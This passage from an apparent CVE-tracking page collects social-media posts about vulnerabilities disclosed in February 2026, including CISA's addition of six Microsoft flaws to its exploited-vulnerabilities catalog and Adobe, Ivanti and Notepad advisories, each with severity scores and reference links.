CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

CVE-2026-21525
(6.2 MEDIUM)

EPSS: 0.00%

updated 2026-02-10T21:51:48.077000

9 posts

Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.

0x3e4@cyberplace.social at 2026-02-10T22:45:41.000Z ##

🔐 CVE-2026-21525
CVE-2026-21525

Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.

📊 CVSS Score: 6.2
⚠️ Severity: Medium
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21525
🛡️ CWE: CWE-476
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

secdb at 2026-02-10T22:00:15.348Z ##

🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-21510 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21513 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21514 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21519 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21525 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21533 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

AAKL at 2026-02-10T21:44:38.176Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20

##

cisakevtracker@mastodon.social at 2026-02-10T19:01:38.000Z ##

CVE ID: CVE-2026-21525
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer at 2026-02-10T18:52:59.664Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

0x3e4@cyberplace.social at 2026-02-10T22:45:41.000Z ##

🔐 CVE-2026-21525
CVE-2026-21525

Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.

📊 CVSS Score: 6.2
⚠️ Severity: Medium
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21525
🛡️ CWE: CWE-476
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

AAKL@infosec.exchange at 2026-02-10T21:44:38.000Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20 #CISA #infosec #Microsoft #vulnerability

##

cisakevtracker@mastodon.social at 2026-02-10T19:01:38.000Z ##

CVE ID: CVE-2026-21525
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-02-10T18:52:59.000Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

CVE-2026-21533
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:51:48.077000

9 posts

Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.

0x3e4@cyberplace.social at 2026-02-10T22:45:40.000Z ##

🔐 CVE-2026-21533
CVE-2026-21533

Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.

📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21533
🛡️ CWE: CWE-269
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

secdb at 2026-02-10T22:00:15.348Z ##

🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-21510 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21513 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21514 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21519 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21525 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21533 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

AAKL at 2026-02-10T21:44:38.176Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20

##

cisakevtracker@mastodon.social at 2026-02-10T19:02:09.000Z ##

CVE ID: CVE-2026-21533
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer at 2026-02-10T18:52:59.664Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

0x3e4@cyberplace.social at 2026-02-10T22:45:40.000Z ##

🔐 CVE-2026-21533
CVE-2026-21533

Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.

📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21533
🛡️ CWE: CWE-269
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

AAKL@infosec.exchange at 2026-02-10T21:44:38.000Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20 #CISA #infosec #Microsoft #vulnerability

##

cisakevtracker@mastodon.social at 2026-02-10T19:02:09.000Z ##

CVE ID: CVE-2026-21533
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-02-10T18:52:59.000Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

CVE-2026-20841
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:51:48.077000

4 posts

Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.

bontchev at 2026-02-10T22:33:25.824Z ##

From the WTF department, sorry, I mean from Microsoft: an RCE in Notepad of all things. (Well, the new app with AI and stuff; not the old one.)

msrc.microsoft.com/update-guid

##

decalage@mastodon.social at 2026-02-10T20:43:06.000Z ##

A vulnerability in Notepad 🤦‍♂️
msrc.microsoft.com/update-guid

##

bontchev@infosec.exchange at 2026-02-10T22:33:25.000Z ##

From the WTF department, sorry, I mean from Microsoft: an RCE in Notepad of all things. (Well, the new app with AI and stuff; not the old one.)

msrc.microsoft.com/update-guid

##

decalage@mastodon.social at 2026-02-10T20:43:06.000Z ##

A vulnerability in Notepad 🤦‍♂️
msrc.microsoft.com/update-guid

##

CVE-2026-21347
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:51:48.077000

2 posts

Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T22:16:23.000Z ##

🟠 CVE-2026-21347 - High (7.8)

Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T22:16:23.000Z ##

🟠 CVE-2026-21347 - High (7.8)

Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21346
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:51:48.077000

2 posts

Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T22:16:13.000Z ##

🟠 CVE-2026-21346 - High (7.8)

Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T22:16:13.000Z ##

🟠 CVE-2026-21346 - High (7.8)

Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21345
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:51:48.077000

2 posts

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T22:16:04.000Z ##

🟠 CVE-2026-21345 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T22:16:04.000Z ##

🟠 CVE-2026-21345 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1602
(6.5 MEDIUM)

EPSS: 0.00%

updated 2026-02-10T21:51:48.077000

2 posts

SQL injection in Ivanti Endpoint Manager before version 2024 SU5 allows a remote authenticated attacker to read arbitrary data from the database.

AAKL at 2026-02-10T16:58:56.429Z ##

New.

Ivanti's vulnerabilities have been wreaking havoc in Europe.

Meanwhile:

Ivanti February 2026 Security Update ivanti.com/blog/february-2026-

The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:

Ivanti Security Advisory EPM February 2026 for EPM 2024 hub.ivanti.com/s/article/Secur

##

AAKL@infosec.exchange at 2026-02-10T16:58:56.000Z ##

New.

Ivanti's vulnerabilities have been wreaking havoc in Europe.

Meanwhile:

Ivanti February 2026 Security Update ivanti.com/blog/february-2026-

The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:

Ivanti Security Advisory EPM February 2026 for EPM 2024 hub.ivanti.com/s/article/Secur #Ivanti #infosec #vulnerability

##

CVE-2026-21344
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:31:42

2 posts

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T21:55:39.000Z ##

🟠 CVE-2026-21344 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:55:39.000Z ##

🟠 CVE-2026-21344 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1507
(7.5 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:31:42

2 posts

The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.

thehackerwire@mastodon.social at 2026-02-10T21:42:04.000Z ##

🟠 CVE-2026-1507 - High (7.5)

The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:42:04.000Z ##

🟠 CVE-2026-1507 - High (7.5)

The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21349
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:31:42

2 posts

Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T21:00:50.000Z ##

🟠 CVE-2026-21349 - High (7.8)

Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:00:50.000Z ##

🟠 CVE-2026-21349 - High (7.8)

Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21353
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:31:41

2 posts

DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T21:55:28.000Z ##

🟠 CVE-2026-21353 - High (7.8)

DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:55:28.000Z ##

🟠 CVE-2026-21353 - High (7.8)

DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21352
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T21:31:41

2 posts

DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T21:55:18.000Z ##

🟠 CVE-2026-21352 - High (7.8)

DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:55:18.000Z ##

🟠 CVE-2026-21352 - High (7.8)

DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2139
